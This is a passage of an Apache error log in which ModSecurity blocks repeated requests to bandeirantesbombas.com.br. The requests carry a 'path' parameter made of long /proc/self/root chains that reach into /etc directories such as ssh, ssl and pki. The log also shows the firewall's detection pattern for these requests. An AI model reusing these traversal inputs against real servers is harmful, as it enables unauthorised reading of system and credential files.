"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZJ0zinOy1jxa1j4cF_QAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:04.427544 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:42610] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZKNY0UrI5A3LftIyVjQAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:05.734777 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:42622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZKUzinOy1jxa1j4cF_wAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:08.399218 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.243.128:42626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZK0zinOy1jxa1j4cGAQAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:09.892014 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:49566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZLQkwaGbbGflqUZAB8AAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:13.200048 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:49570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZMeyqAr6etmhZHNqwlwAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:13.508907 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.228.61:37428] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqZMeyqAr6etmhZHNqwmAAAAFE"]
[Wed Mar 18 09:23:13.755659 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.244.43:33702] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqZMfu8EFLIOrSqIpv2hAAAAks"]
[Wed Mar 18 09:23:16.703059 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:49586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZNNY0UrI5A3LftIyVoAAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:18.430553 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:49588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZNuoXxyEfFpUF8f9f4wAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:19.867358 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:44802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZNwkwaGbbGflqUZAB9wAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:20.772193 2026] [mime_magic:error] [pid 19507:tid 140411733534464] (70014)End of file found: [client 74.7.241.31:48410] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/lib
[Wed Mar 18 09:23:22.291373 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:44812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZOimAPhZkrhU8w4lezgAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:23.579223 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:44820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZO9Y0UrI5A3LftIyVpQAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:24.918021 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:44832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZPMdf6f5d65gmYZTGWQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:25.037661 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:49722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZPeoXxyEfFpUF8f9f5wAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:23:32.668133 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:44844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZREzinOy1jxa1j4cGFgAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:35.135556 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:51290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZR-oXxyEfFpUF8f9f7AAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:41.741953 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:51306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZTSmAPhZkrhU8w4le3QAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:23:45.264165 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:39732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZUeoXxyEfFpUF8f9f8wAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:51.175388 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:39734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZV9a6ubjKNq_cu4aK5QAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:23:52.558052 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:44076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZWMdf6f5d65gmYZTGZwAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:23:58.156709 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.243.128:44078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZXkzinOy1jxa1j4cGMwAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:24:00.493387 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:39950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZYOoXxyEfFpUF8f9f-gAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
